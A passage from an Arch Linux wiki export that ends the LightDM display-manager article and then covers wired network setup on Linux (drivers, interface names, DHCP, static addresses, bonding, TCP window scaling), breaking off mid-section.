== Optional configuration and Tweaks ==<br />
Some greeters have their own configuration files. For example, {{Pkg|lightdm-gtk3-greeter}} has:<br />
/etc/lightdm/lightdm-gtk-greeter.conf<br />
and {{Pkg|lightdm-kde-greeter}} has:<br />
/etc/lightdm/lightdm-kde-greeter.conf<br />
as well as a section in KDE's System Settings (recommended).<br />
<br />
LightDM can be configured by directly modifying its configuration script or by using the {{ic|lightdm-set-defaults}} applications<br />
that can be found in {{ic|/usr/lib/lightdm/lightdm/}}. To see some of the options available, execute:<br />
$ man lightdm-set-defaults<br />
<br />
There are, however, a lot more variables to modify in the configuration file than by using the {{ic|lightdm-set-defaults}} application.<br />
<br />
=== Changing Background Images/Colors ===<br />
Users wishing to have a flat color (no image) may simply set the '''background''' variable to a hex color.<br />
<br />
Example:<br />
background=#000000<br />
<br />
If you want to use an image instead, see below.<br />
<br />
==== GTK+ Greeter ====<br />
Users wishing to customize the wallpaper on the greeter screen need to edit {{ic|/etc/lightdm/lightdm-gtk-greeter.conf}} defining the '''background''' variable.<br />
<br />
Example:<br />
background=/usr/share/pixmaps/black_and_white_photography-wallpaper-1920x1080.jpg<br />
<br />
==== Unity Greeter ====<br />
Users using the {{AUR|lightdm-unity-greeter}} must edit the {{ic|/usr/share/glib-2.0/schemas/com.canonical.unity-greeter.gschema.xml}} file and then execute:<br />
# glib-compile-schemas /usr/share/glib-2.0/schemas/<br />
<br />
According to [https://bbs.archlinux.org/viewtopic.php?id=149945 this] page.<br />
<br />
{{Note|It is recommended to place the PNG or JPG file in {{ic|/usr/share/pixmaps}} since the LightDM user needs read access to the wallpaper file.}}<br />
<br />
==== KDE Greeter ====<br />
Go to ''System Settings > Login Screen (LightDM)'' and change the background image for your theme.<br />
<br />
=== Changing your avatar ===<br />
<br />
==== The .face way ====<br />
Users wishing to customize their image on the greeter screen need to place an PNG image called {{ic|.face}} or {{ic|.face.icon}} in their home directory. Make sure it can be read by LightDM.<br />
<br />
{{Note|As of December 2013, some people have issues where the icon file does not get picked up. The preferred way is to install accountsservice and use the following AccountsService way.}}<br />
<br />
==== The AccountsService way ====<br />
The .face way is known to cause issues, fortunately LightDM is able to automatically use AccountsService if it is installed. AccountsService files need to be set up as follows:<br />
<br />
* A user file named after your user in {{ic|/var/lib/AccountsService/users/johndoe}} containing:<br />
<br />
[User]<br />
Icon=/var/lib/AccountsService/icons/johndoe<br />
<br />
* A 96x96 PNG icon file in {{ic|/var/lib/AccountsService/icons/johndoe}}<br />
<br />
==== Sources of Arch-centric 64x64 Icons ====<br />
The {{aur|archlinux-artwork}} package from the [[AUR]] contains some nice examples that install to {{ic|/usr/share/archlinux/icons}} and that can be copied to {{ic|/usr/share/icons/hicolor/64x64/devices}} as follows:<br />
# find /usr/share/archlinux/icons -name "*64*" -exec cp {} /usr/share/icons/hicolor/64x64/devices \;<br />
<br />
After copying, the {{aur|archlinux-artwork}} package can be removed.<br />
<br />
=== Enabling Autologin ===<br />
Edit the LightDM configuration file and change these lines to:<br />
{{hc|/etc/lightdm/lightdm.conf|2=<br />
autologin-user=''USERNAME''<br />
autologin-user-timeout=0<br />
}}<br />
or execute:<br />
<br />
# /usr/lib/lightdm/lightdm/lightdm-set-defaults --autologin=''USERNAME''<br />
<br />
LightDM goes through PAM even when {{ic|autologin}} is enabled. You must be part of the {{ic|autologin}} group to be able to login without entering your password:<br />
<br />
# groupadd autologin<br />
# gpasswd -a ''USERNAME'' autologin<br />
<br />
{{Note|GNOME users, and by extension any gnome-keyring user will have to set up a blank password to their keyring for it to be unlocked automatically.}}<br />
<br />
=== Hiding system and services users ===<br />
To prevent system users from showing-up in the login, install the optional dependency {{Pkg|accountsservice}}, or add the user names to {{ic|/etc/lightdm/users.conf}} under {{ic|hidden-users}}. The first option has the advantage of not needing to updated the list when more users are added or removed.<br />
<br />
=== Migrating from SLiM ===<br />
Move the contents of [[xinitrc]] to [[xprofile]], removing the call to start the [[window manager]] or [[desktop environment]].<br />
<br />
=== NumLock ON ===<br />
Install the {{Pkg|numlockx}} package and the edit {{ic|/etc/lightdm/lightdm.conf}} adding the following line:<br />
greeter-setup-script=/usr/bin/numlockx on<br />
<br />
=== User switching under Xfce 4 ===<br />
With the release of Xfce 4.10, user switching is supported natively. To use it with LightDM, users need only to create a symlink:<br />
# ln -s /usr/lib/lightdm/lightdm/gdmflexiserver /usr/local/bin/gdmflexiserver<br />
<br />
Alternatively, see the [[XScreenSaver#Lightdm]] article.<br />
<br />
=== Default Session ===<br />
<br />
Lightdm, like other DMs, stores the last-selected xsession in {{ic|~/.dmrc}}. See [[Display_Manager#Session_list]] for more info.<br />
<br />
== Troubleshooting ==<br />
If you encounter consistent screen flashing and ultimately no lightdm on boot, ensure that you have defined the greeter correctly in lightdm's config file. And if you have correctly defined the GTK greeter, make sure the {{ic|xsessions-directory}} (default: {{ic|/usr/share/xsessions}}) exists and contains at least one .desktop file.<br />
<br />
=== Power menu (restart, poweroff etc.) not available ===<br />
If you have installed lightdm before lightdm-1:1.6.0-6, you might have been struck by this bug: [https://bugs.archlinux.org/task/36613 FS#36613], to fix it run:<br />
# chown polkitd:root /usr/share/polkit-1/rules.d<br />
<br />
=== Wrong locale displayed ===<br />
In case of your locale not being displayed correctly in Lightdm add your locale to {{ic|/etc/environment}}<br />
LANG=pt_PT.utf8<br />
<br />
=== Xresources not being parsed correctly ===<br />
LightDM has an upstream bug where your [[Xresources]] file will not be loaded with a pre-processor. In practical terms, this means that variables set with {{ic|#define}} are not expanded when called later. You may see this reflected as an all-pink screen if using a custom color set with urxvt. To fix it, edit {{ic|/etc/lightdm/Xsession}} and search for the line:<br />
xrdb -nocpp -merge "$file"<br />
Change it to read:<br />
xrdb -merge "$file"<br />
Your Xresources will now be pre-processed so that variables are correctly expanded.<br />
<br />
== See Also ==<br />
* [https://wiki.ubuntu.com/LightDM Ubuntu Wiki article]<br />
* [http://wiki.gentoo.org/wiki/LightDM Gentoo Wiki article]<br />
* [https://launchpad.net/lightdm Launchpad Page]<br />
* [http://www.mattfischer.com/blog/?tag=lightdm LightDM blog]</div>Wakehttps://wiki.archlinux.org/index.php?title=Network_configuration&diff=268161Network configuration2013-07-27T02:06:32Z<p>Wake: /* No eth0 with Atheros AR8161 */ Not needed with the 3.10.2-1-ARCH kernel update.</p>
<hr />
<div>[[Category:Networking]]<br />
[[Category:Getting and installing Arch]]<br />
[[cs:Configuring Network]]<br />
[[es:Configuring Network]]<br />
[[fr:Connexions reseau]]<br />
[[it:Configuring Network]]<br />
[[ja:Network Configuration]]<br />
[[nl:Configuring Network]]<br />
[[pt:Configuring Network]]<br />
[[ro:Configurare retea]]<br />
[[ru:Configuring Network]]<br />
[[sk:Configuring Network]]<br />
[[tr:Ağ_Yapılandırması]]<br />
[[zh-CN:Network Configuration]]<br />
{{Article summary start}}<br />
{{Article summary text|A simple guide for setting up and troubleshooting network.}}<br />
{{Article summary heading|Overview}}<br />
{{Article summary text|{{Networking overview}}}}<br />
{{Article summary heading|Related}}<br />
{{Article summary wiki|Jumbo Frames}}<br />
{{Article summary wiki|Firewalls}}<br />
{{Article summary wiki|Samba}}<br />
{{Article summary wiki|Wireless Setup}}<br />
{{Article summary end}}<br />
<br />
This page explains how to set up a '''wired''' connection to a network. If you need to set up '''wireless''' networking see the [[Wireless_Setup|Wireless Setup]] page.<br />
<br />
== Check the connection ==<br />
{{Note|If you receive an error like {{ic|ping: icmp open socket: Operation not permitted}} when executing ping, try to re-install the {{ic|iputils}} package.}} <br />
<br />
Many times, the basic installation procedure has created a working network configuration. To check if this is so, use the following command:<br />
<br />
{{Note|The {{ic|-c 3}} option calls it three times. See {{ic|man ping}} for more information.}}<br />
<br />
{{hc|$ ping -c 3 www.google.com|2=<br />
PING www.l.google.com (74.125.224.146) 56(84) bytes of data.<br />
64 bytes from 74.125.224.146: icmp_req=1 ttl=50 time=437 ms<br />
64 bytes from 74.125.224.146: icmp_req=2 ttl=50 time=385 ms<br />
64 bytes from 74.125.224.146: icmp_req=3 ttl=50 time=298 ms<br />
<br />
--- www.l.google.com ping statistics ---<br />
3 packets transmitted, 3 received, 0% packet loss, time 1999ms<br />
rtt min/avg/max/mdev = 298.107/373.642/437.202/57.415 ms}}<br />
<br />
If it works, then you may only wish to personalize your settings from the options below.<br />
<br />
If the previous command complains about unknown hosts, it means that your machine was unable to resolve this domain name. It might be related to your service provider or your router/gateway. You can try pinging a static IP address to prove that your machine has access to the Internet.<br />
<br />
{{hc|$ ping -c 3 8.8.8.8|2=<br />
PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.<br />
64 bytes from 8.8.8.8: icmp_req=1 ttl=53 time=52.9 ms<br />
64 bytes from 8.8.8.8: icmp_req=2 ttl=53 time=72.5 ms<br />
64 bytes from 8.8.8.8: icmp_req=3 ttl=53 time=70.6 ms<br />
<br />
--- 8.8.8.8 ping statistics ---<br />
3 packets transmitted, 3 received, 0% packet loss, time 2002ms<br />
rtt min/avg/max/mdev = 52.975/65.375/72.543/8.803 ms}}<br />
<br />
{{Note|{{ic|8.8.8.8}} is a static address that is easy to remember. It is the address of Google's primary DNS server, therefore it can be considered reliable, and is generally not blocked by content filtering systems and proxies.}}<br />
<br />
If you are able to ping this address, you may try adding this nameserver to your {{ic|/etc/resolv.conf}} file.<br />
<br />
== Set the hostname ==<br />
<br />
A [[Wikipedia:Hostname|hostname]] is a unique name created to identify a machine on a network: it is configured in {{ic|/etc/hostname}}. The file can contain the system's domain name, if any. To set the hostname, do:<br />
<br />
# hostnamectl set-hostname '''myhostname'''<br />
<br />
This will put '''myhostname''' in {{ic|/etc/hostname}}.<br />
<br />
See {{ic|man 5 hostname}} and {{ic|man 1 hostnamectl}} for details.<br />
<br />
{{Note|<br />
*{{ic|hostnamectl}} supports FQDNs<br />
*You no longer need to edit {{ic|/etc/hosts}}, {{pkg|systemd}} will provide host name resolution, and is installed on all systems by default.}}<br />
<br />
To set the hostname temporarily (until a reboot), use the {{ic|hostname}} command from {{Pkg|inetutils}}:<br />
<br />
# hostname ''myhostname''<br />
<br />
== Device Driver ==<br />
<br />
=== Check the driver status ===<br />
<br />
Udev should detect your network interface card ([[Wikipedia:Network_interface_controller|NIC]]) and automatically load the necessary module at start up. Check the "Ethernet controller" entry (or similar) from the {{ic|lspci -v}} output. It should tell you which kernel module contains the driver for your network device. For example:<br />
<br />
{{hc|$ lspci -v|<br />
02:00.0 Ethernet controller: Attansic Technology Corp. L1 Gigabit Ethernet Adapter (rev b0)<br />
...<br />
Kernel driver in use: atl1<br />
Kernel modules: atl1}}<br />
<br />
Next, check that the driver was loaded via {{ic|dmesg <nowiki>|</nowiki> grep ''module_name''}}. For example:<br />
<br />
$ dmesg | grep atl1<br />
...<br />
atl1 0000:02:00.0: eth0 link is up 100 Mbps full duplex<br />
<br />
Skip the next section if the driver was loaded successfully. Otherwise, you will need to know which module is needed for your particular model.<br />
<br />
=== Load the device module ===<br />
<br />
Google for the right module/driver for the chipset. Once you know which module to use, you can [[Kernel modules#Loading|load it]] with:<br />
<br />
# modprobe ''module_name''<br />
<br />
If udev is not detecting and loading the proper module automatically during bootup, you can add it to a {{ic|*.conf}} file from the {{ic|/etc/modules-load.d/}} folder so that you do not need to {{ic|modprobe}} it every time you boot. For example, if {{ic|tg3}} is the network module:<br />
<br />
# tee /etc/modules-load.d/tg3.conf <<< "tg3"<br />
<br />
Other common modules are {{ic|8139too}} for cards with a Realtek chipset, or {{ic|sis900}} for cards with a SiS chipset.<br />
<br />
== Network Interfaces ==<br />
<br />
=== Device names ===<br />
<br />
For motherboards that have integrated NICs, it is important to have fixed device name. Many configuration problems are caused by interface name changing.<br />
<br />
[[Udev]] is responsible for which device gets which name. Systemd v197 introduced [http://www.freedesktop.org/wiki/Software/systemd/PredictableNetworkInterfaceNames Predictable Network Interface Names], which automatically assigns static names to network devices. Interfaces are now prefixed with en (ethernet), wl (WLAN), or ww (WWAN) followed by an automatically generated identifier, creating an entry such as {{ic|enp0s25}}. <br />
<br />
This behavior may be disabled by adding a symlink:<br />
<br />
# ln -s /dev/null /etc/udev/rules.d/80-net-name-slot.rules<br />
<br />
Users upgrading from an earlier systemd version will have a blank rules file created automatically. So if you want to use persistent device names, just delete the file.<br />
<br />
==== Change device name ====<br />
You can change the device name by defining the name manually with an udev-rule. For example: <br />
{{hc|/etc/udev/rules.d/10-network.rules|2=<br />
SUBSYSTEM=="net", ACTION=="add", ATTR{address}=="aa:bb:cc:dd:ee:ff", NAME="net1"<br />
SUBSYSTEM=="net", ACTION=="add", ATTR{address}=="ff:ee:dd:cc:bb:aa", NAME="net0"}}<br />
A couple things to note:<br />
<br />
* To get the MAC address of each card, use this command: {{ic|cat /sys/class/net/'''device-name'''/address}}<!-- {{ic|<nowiki>udevadm info -a -p /sys/class/net/<yourdevice> | grep address | tr [A-Z] [a-z]</nowiki>}} --><br />
* Make sure to use the lower-case hex values in your udev rules. It doesn't like upper-case. <br />
{{Note|When choosing the static names '''it should be avoided to use names in the format of "eth''X''" and "wlan''X''"''', because this may lead to race conditions between the kernel and udev during boot. Instead, it is better to use interface names that are not used by the kernel as default, e.g.: {{ic|net0}}, {{ic|net1}}, {{ic|wifi0}}, {{ic|wifi1}}. For further details please see the [http://www.freedesktop.org/wiki/Software/systemd/PredictableNetworkInterfaceNames systemd] documentation.}}<br />
<br />
=== Set device MTU and queue Length ===<br />
You can change the device MTU and queue length by defining manually with an udev-rule. For example: <br />
{{hc|/etc/udev/rules.d/10-network.rules|2=<br />
ACTION=="add", SUBSYSTEM=="net", KERNEL=="wl*", ATTR{mtu}="1480", ATTR{tx_queue_len}="2000"}}<br />
<br />
=== Get current device names ===<br />
<br />
Current NIC names can be found via sysfs<br />
<br />
{{hc|$ ls /sys/class/net|<br />
lo eth0 eth1 firewire0}}<br />
<br />
=== Enabling and disabling network interfaces ===<br />
<br />
You can activate or deactivate network interfaces using:<br />
<br />
# ip link set eth0 up<br />
# ip link set eth0 down<br />
<br />
To check the result:<br />
<br />
{{hc|$ ip link show dev eth0|<br />
2: eth0: <BROADCAST,MULTICAST,PROMISC,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast master br0 state UP mode DEFAULT qlen 1000<br />
[...]}}<br />
<br />
== Configure the IP address ==<br />
<br />
You have two options: a dynamically assigned address using [[Wikipedia:Dynamic Host Configuration Protocol|DHCP]], or an unchanging "static" address.<br />
<br />
=== Dynamic IP address ===<br />
<br />
==== Manually run DHCP Client Daemon ====<br />
<br />
Please note that {{ic|dhcpcd}} is not {{ic|dhcpd}}.<br />
<br />
{{hc|# dhcpcd eth0|<br />
dhcpcd: version 5.1.1 starting<br />
dhcpcd: eth0: broadcasting for a lease<br />
...<br />
dhcpcd: eth0: leased 192.168.1.70 for 86400 seconds}}<br />
<br />
And now, {{ic|ip addr show dev eth0}} should show your inet address.<br />
<br />
For some people, {{ic|dhclient}} (from the {{Pkg|dhclient}} package) works where {{ic|dhcpcd}} fails.<br />
<br />
==== Run DHCP at boot ====<br />
<br />
If you simply want to use DHCP for your Ethernet connection, you can use {{ic|dhcpcd@.service}} (provided by the {{Pkg|dhcpcd}} package).<br />
<br />
To start DHCP for {{ic|eth0}}, simply use:<br />
<br />
# systemctl start dhcpcd@eth0<br />
<br />
You can enable the service to automatically start at boot with:<br />
<br />
# systemctl enable dhcpcd@eth0<br />
<br />
If the dhcpd service starts before your network card module ({{bug|30235}}), manually add your network card to {{ic|/etc/modules-load.d/*.conf}}. For example, if your Realtek card needs {{ic|r8169}} to be loaded, create:<br />
<br />
{{hc|/etc/modules-load.d/realtek.conf|<br />
r8169}}<br />
<br />
{{Tip|To find out which modules are used by your network card, use {{ic|lspci -k}}.}}<br />
<br />
If you use DHCP and you do '''not''' want your DNS servers automatically assigned every time you start your network, be sure to add the following to the last section of {{ic|dhcpcd.conf}}:<br />
<br />
{{hc|/etc/dhcpcd.conf|<br />
nohook resolv.conf}}<br />
<br />
To prevent {{ic|dhcpcd}} from adding domain name servers to {{ic|/etc/resolv.conf}}, use the {{ic|nooption}} option:<br />
<br />
{{hc|/etc/dhcpcd.conf|<br />
nooption domain_name_servers}}<br />
<br />
Then add your own DNS name server to {{ic|/etc/resolv.conf}}.<br />
<br />
You may use the {{Pkg|openresolv}} package if several different processes want to control {{ic|/etc/resolv.conf}} (e.g. {{Pkg|dhcpcd}} and a VPN client). No additional configuration for {{Pkg|dhcpcd}} is needed to use {{Pkg|openresolv}}.<br />
<br />
=== Static IP address ===<br />
<br />
There are various reasons why you may wish to assign static IP addresses on your network. For instance, one may gain a certain degree of predictability with unchanging addresses, or you may not have a DHCP server available.<br />
<br />
{{Note|If you share your Internet connection from a Windows machine without a router, be sure to use static IP addresses on both computers to avoid LAN problems.}}<br />
<br />
You need:<br />
<br />
* Static IP address<br />
* [[Wikipedia:Subnetwork|Subnet mask]]<br />
* [[Wikipedia:Broadcast_address|Broadcast address]]<br />
* [[Wikipedia:Default_gateway|Gateway]]'s IP address<br />
<br />
If you are running a private network, it is safe to use IP addresses in 192.168.*.* for your IP addresses, with a subnet mask of 255.255.255.0 and a broadcast address of 192.168.*.255. The gateway is usually 192.168.*.1 or 192.168.*.254.<br />
<br />
==== Manual assignment ====<br />
<br />
You can assign a static IP address in the console:<br />
<br />
# ip addr add <IP address>/<subnet mask> dev <interface><br />
<br />
For example:<br />
<br />
# ip addr add 192.168.1.2/24 dev eth0<br />
<br />
{{Note|The subnet mask was specified using [[Wikipedia:CIDR_notation|CIDR notation]].}}<br />
<br />
For more options, see {{ic|man ip}}.<br />
<br />
Add your gateway like so:<br />
<br />
# ip route add default via <default gateway IP address><br />
<br />
For example:<br />
<br />
# ip route add default via 192.168.1.1<br />
<br />
If you the get the error "No such process", it means you have to run {{ic|ip link set dev eth0 up}} as root.<br />
<br />
====Manual connection at boot using systemd====<br />
This section details how to manually connect using [[systemd]].<br />
<br />
{{Note|We use {{ic|net0}} as the interface name in these examples, you have to replace all occurrences (including those in the {{ic|BindsTo}} and {{ic|After}} values) with the name of the interface you are configuring.}}<br />
<br />
=====Using [[dhcpcd]]=====<br />
Create the file {{ic|/etc/systemd/system/network.service}} using your editor of choice. This example uses [[wpa_supplicant]].<br />
{{hc|/etc/systemd/system/network.service|<nowiki><br />
[Unit]<br />
Description=Network Connectivity<br />
Wants=network.target<br />
Before=network.target<br />
BindsTo=sys-subsystem-net-devices-net0.device<br />
After=sys-subsystem-net-devices-net0.device<br />
<br />
[Service]<br />
Type=oneshot<br />
RemainAfterExit=yes<br />
ExecStart=/usr/bin/ip link set dev net0 up<br />
ExecStart=/usr/bin/wpa_supplicant -B -i net0 -c /etc/wpa_supplicant.conf # Remove this for wired connections<br />
ExecStart=/usr/bin/dhcpcd net0<br />
<br />
ExecStop=/usr/bin/dhcpcd -k net0<br />
ExecStop=/usr/bin/ip addr flush dev net0<br />
ExecStop=/usr/bin/ip link set dev net0 down<br />
<br />
[Install]<br />
WantedBy=multi-user.target<br />
</nowiki>}}<br />
<br />
# systemctl enable network<br />
<br />
To test, reboot or stop all other network daemons and run as root:<br />
# systemctl start network<br />
<br />
=====Using a static IP address=====<br />
Create the file {{ic|/etc/systemd/system/network.service}} using your editor of choice. This example uses a static IP address and [[wpa_supplicant]].<br />
{{hc|/etc/systemd/system/network.service|<nowiki><br />
[Unit]<br />
Description=Wireless Static IP Connectivity<br />
Wants=network.target<br />
Before=network.target<br />
BindsTo=sys-subsystem-net-devices-net0.device<br />
After=sys-subsystem-net-devices-net0.device<br />
<br />
[Service]<br />
Type=oneshot<br />
RemainAfterExit=yes<br />
ExecStart=/usr/bin/ip link set dev net0 up<br />
ExecStart=/usr/bin/wpa_supplicant -B -i net0 -c /etc/wpa_supplicant.conf # Remove this for wired connections<br />
ExecStart=/usr/bin/ip addr add 192.168.0.10/24 dev net0<br />
ExecStart=/usr/bin/ip route add default via 192.168.0.1<br />
<br />
ExecStop=/usr/bin/ip addr flush dev net0<br />
ExecStop=/usr/bin/ip link set dev net0 down<br />
<br />
[Install]<br />
WantedBy=multi-user.target<br />
</nowiki>}}<br />
<br />
Do not forget to enable it!<br />
# systemctl enable network<br />
<br />
To test, reboot or make sure all other network daemons are stopped and then run as root<br />
# systemctl start network<br />
<br />
==== Calculating addresses ====<br />
<br />
You can use {{ic|ipcalc}} provided by the {{Pkg|ipcalc}} package to calculate IP broadcast, network, netmask, and host ranges for more advanced configurations. For example, I use ethernet over firewire to connect a windows machine to arch. For security and network organization, I placed them on their own network and configured the netmask and broadcast so that they are the only 2 machines on it. To figure out the netmask and broadcast addresses for this, I used ipcalc, providing it with the IP of the arch firewire nic 10.66.66.1, and specifying ipcalc should create a network of only 2 hosts.<br />
<br />
{{hc|$ ipcalc -nb 10.66.66.1 -s 1|2=<br />
Address: 10.66.66.1<br />
<br />
Netmask: 255.255.255.252 = 30<br />
Network: 10.66.66.0/30<br />
HostMin: 10.66.66.1<br />
HostMax: 10.66.66.2<br />
Broadcast: 10.66.66.3<br />
Hosts/Net: 2 Class A, Private Internet}}<br />
<br />
== Load configuration ==<br />
<br />
To test your settings either reboot the computer or reload the relevant systemd services:<br />
<br />
# systemctl restart dhcpcd@eth0<br />
<br />
Try pinging your gateway, DNS server, ISP provider and other Internet sites, in that order, to detect any connection problems along the way, as in this example:<br />
<br />
$ ping -c 3 www.google.com<br />
<br />
== Additional settings ==<br />
<br />
=== ifplugd for laptops ===<br />
<br />
{{Pkg|ifplugd}} in [[Official Repositories]] is a daemon which will automatically configure your Ethernet device when a cable is plugged in and automatically unconfigure it if the cable is pulled. This is useful on laptops with onboard network adapters, since it will only configure the interface when a cable is really connected. Another use is when you just need to restart the network but do not want to restart the computer or do it from the shell.<br />
<br />
By default it is configured to work for the {{ic|eth0}} device. This and other settings like delays can be configured in {{ic|/etc/ifplugd/ifplugd.conf}}.<br />
<br />
{{Note|[[Netctl]] package includes {{ic|netctl-ifplugd@.service}}, otherwise you can use {{ic|ifplugd@.service}} from {{Pkg|ifplugd}} package. Use for example {{ic|systemctl enable ifplugd@eth0.service}}.}}<br />
<br />
=== Bonding or LAG ===<br />
<br />
<br />
You will need {{Pkg|netctl}} from the [[Official Repositories]].<br />
<br />
copy {{ic|/etc/netctl/examples/bonding}} to {{ic|/etc/netctl/bonding}} and edit it, for example, to be the following: <br />
<br />
{{hc|/etc/netctl/bonding|2=<br />
Description='Bond Interface'<br />
Interface='bond0'<br />
Connection=bond<br />
BindsToInterfaces=('eth0' 'eth1')<br />
IP=dhcp<br />
IP6=stateless}}<br />
<br />
Now you can disable and stop your old configuration and set bonding to be automaticly started:<br />
<br />
Disable your old configuration:<br />
# netctl stop ethernet<br />
# netctl disable ethernet<br />
Enable and start bonding:<br />
# netctl start bonding<br />
# netctl enable bonding<br />
<br />
{{Note|To change the bonding mode (default is round robin) to, e.g, active backup:<br />
<br />
Create {{ic|/etc/modprobe.d/bonding.conf}}:<br />
<br />
{{hc|/etc/modprobe.d/bonding.conf|2=<br />
options bonding mode=active-backup<br />
options bonding miimon=100}}<br />
<br />
For more information about the different bonding policies (and other driver settings) see the [http://sourceforge.net/projects/bonding/files/Documentation/ Linux Ethernet Bonding Driver HOWTO] and [http://www.linuxfoundation.org/collaborate/workgroups/networking/bonding The Linux Foundation: bonding].}}<br />
<br />
To check the status and bonding mode:<br />
<br />
$ cat /proc/net/bonding/bond0<br />
<br />
==== Wired -> Wireless Failover ====<br />
<br />
Using {{ic|bonding}} to fallback to wireless when the wired ethernet goes down, this also detects the presence of either network connection and starts dhcpcd when either or both are connected.<br />
<br />
You'll need {{Pkg|netctl}}, {{Pkg|ifplugd}}, {{Pkg|ifenslave}}, and {{Pkg|wpa_supplicant}} from the official repositories.<br />
<br />
First configure the bonding driver to use active-backup:<br />
<br />
{{hc|/etc/modprobe.d/bonding.conf|2=<br />
options bonding mode=active-backup<br />
options bonding miimon=100<br />
options bonding primary=eth0<br />
options bonding max_bonds=0}}<br />
<br />
The `max-bonds` line avoids getting the "Interface bond0 already exists" error.<br />
<br />
Next, configure a {{Pkg|netctl}} profile to enslave the two hardware interfaces:<br />
<br />
{{hc|/etc/netctl/failover|2=<br />
Description='A wired connection with failover to wireless'<br />
Interface='bond0'<br />
Connection=bond<br />
BindsToInterfaces=('eth0' 'wlan0')<br />
IP='no'<br />
SkipNoCarrier='no'}}<br />
<br />
Enable the profile on startup.<br />
<br />
# netctl enable failover<br />
<br />
Configure wpa_supplicant to associate with known networks. This can be done with a netctl profile (remember to use IP='no'), a wpa_supplicant service running constantly, or on-demand with wpa_cli. Ways to do this are covered on the [[wpa_supplicant]] page.<br />
<br />
Create an {{Pkg|ifplugd}} action for automatic DHCP assignment on the bonded interface:<br />
<br />
{{hc|/etc/ifplugd/bond_dhcp.action|2=<br />
#!/bin/sh<br />
<br />
case "$2" in<br />
up)<br />
systemctl start "dhcpcd@$1.service" && exit 0<br />
;;<br />
down)<br />
systemctl stop "dhcpcd@$1.service" && exit 0<br />
;;<br />
*)<br />
echo "Wrong arguments" > /dev/stderr<br />
;;<br />
esac<br />
exit 1}}<br />
<br />
and make it executable<br />
<br />
# chmod +x /etc/ifplugd/bond_dhcp.action<br />
<br />
Then create the [[systemd]] service which starts ifplugd for bond0:<br />
<br />
{{hc|/etc/systemd/system/net-auto-bonded@.service|2=<br />
[Unit]<br />
Description=Provides automatic dhcp resolution for bonded failover connection<br />
Requires=netctl@failover.service<br />
After=netctl@failover.service<br />
<br />
[Service]<br />
ExecStart=/usr/bin/ifplugd -i %i -r /etc/ifplugd/bond_dhcp.action -fIns<br />
<br />
[Install]<br />
WantedBy=multi-user.target}}<br />
<br />
Enable the net-auto-bonded service and reboot:<br />
<br />
# systemctl enable net-auto-bonded@bond0.service<br />
# reboot<br />
<br />
If you have a wired and wireless connection to the same network, you can probably now disconnect and reconnect the wired connection without losing connectivity. In most cases, even streaming music won't skip!<br />
<br />
=== IP address aliasing ===<br />
<br />
IP aliasing is the process of adding more than one IP address to a network interface. With this, one node on a network can have multiple connections to a network, each serving a different purpose.<br />
<br />
To use IP aliasing from [[netcfg]], change {{ic|POST_UP}} and {{ic|PRE_DOWN}} commands in your network profile to set up the additional IP addresses manually. See [https://bbs.archlinux.org/viewtopic.php?pid=1036395#p1036395 here] for details.<br />
<br />
==== Example ====<br />
<br />
You will need {{Pkg|netctl}} from the [[Official Repositories]].<br />
<br />
Prepare the configuration:<br />
<br />
{{hc|/etc/netctl/mynetwork|2=<br />
<br />
Connection='ethernet'<br />
Description='Five different addresses on the same NIC.'<br />
Interface='eth0'<br />
IP='static'<br />
Address=('192.168.1.10' '192.168.178.11' '192.168.1.12' '192.168.1.13' '192.168.1.14' '192.168.1.15')<br />
Gateway='192.168.1.1'<br />
DNS=('192.168.1.1')<br />
Donain=''<br />
}}<br />
Then simply execute: <br />
<br />
$ netctl start mynetwork<br />
<br />
=== Change MAC/hardware address ===<br />
<br />
See [[MAC Address Spoofing]].<br />
<br />
=== Internet Share ===<br />
<br />
See [[Internet Share]].<br />
<br />
=== Router Configuration ===<br />
<br />
See [[Router]].<br />
<br />
== Troubleshooting ==<br />
<br />
=== Swapping computers on the cable modem ===<br />
<br />
Most domestic cable ISPs (videotron for example) have the cable modem configured to recognize only one client PC, by the MAC address of its network interface. Once the cable modem has learned the MAC address of the first PC or equipment that talks to it, it will not respond to another MAC address in any way. Thus if you swap one PC for another (or for a router), the new PC (or router) will not work with the cable modem, because the new PC (or router) has a MAC address different from the old one. To reset the cable modem so that it will recognise the new PC, you must power the cable modem off and on again. Once the cable modem has rebooted and gone fully online again (indicator lights settled down), reboot the newly connected PC so that it makes a DHCP request, or manually make it request a new DHCP lease.<br />
<br />
If this method does not work, you will need to clone the MAC address of the original machine. See also [[Configuring Network#Change MAC/hardware address|Change MAC/hardware address]].<br />
<br />
=== The TCP window scaling problem ===<br />
<br />
TCP packets contain a "window" value in their headers indicating how much data the other host may send in return. This value is represented with only 16 bits, hence the window size is at most 64Kb. TCP packets are cached for a while (they have to be reordered), and as memory is (or used to be) limited, one host could easily run out of it.<br />
<br />
Back in 1992, as more and more memory became available, [http://www.faqs.org/rfcs/rfc1323.html RFC 1323] was written to improve the situation: Window Scaling. The "window" value, provided in all packets, will be modified by a Scale Factor defined once, at the very beginning of the connection.<br />
<br />
That 8-bit Scale Factor allows the Window to be up to 32 times higher than the initial 64Kb.<br />
<br />
It appears that some broken routers and firewalls on the Internet are rewriting the Scale Factor to 0 which causes misunderstandings between hosts.<br />
<br />
The Linux kernel 2.6.17 introduced a new calculation scheme generating higher Scale Factors, virtually making the aftermaths of the broken routers and firewalls more visible.<br />
<br />
The resulting connection is at best very slow or broken.<br />
<br />
==== How to diagnose the problem ====<br />
<br />
First of all, let's make it clear: this problem is odd. In some cases, you will not be able to use TCP connections (HTTP, FTP, ...) at all and in others, you will be able to communicate with some hosts (very few).<br />
<br />
When you have this problem, the {{ic|dmesg}}'s output is OK, logs are clean and {{ic|ip addr}} will report normal status... and actually everything appears normal.<br />
<br />
If you cannot browse any website, but you can ping some random hosts, chances are great that you're experiencing this problem: ping uses ICMP and is not affected by TCP problems.<br />
<br />
You can try to use Wireshark. You might see successful UDP and ICMP communications but unsuccessful TCP communications (only to foreign hosts).<br />
<br />
==== How to fix it (The bad way) ====<br />
<br />
To fix it the bad way, you can change the tcp_rmem value, on which Scale Factor calculation is based. Although it should work for most hosts, it is not guaranteed, especially for very distant ones.<br />
<br />
# echo "4096 87380 174760" > /proc/sys/net/ipv4/tcp_rmem<br />
<br />
==== How to fix it (The good way) ====<br />
<br />
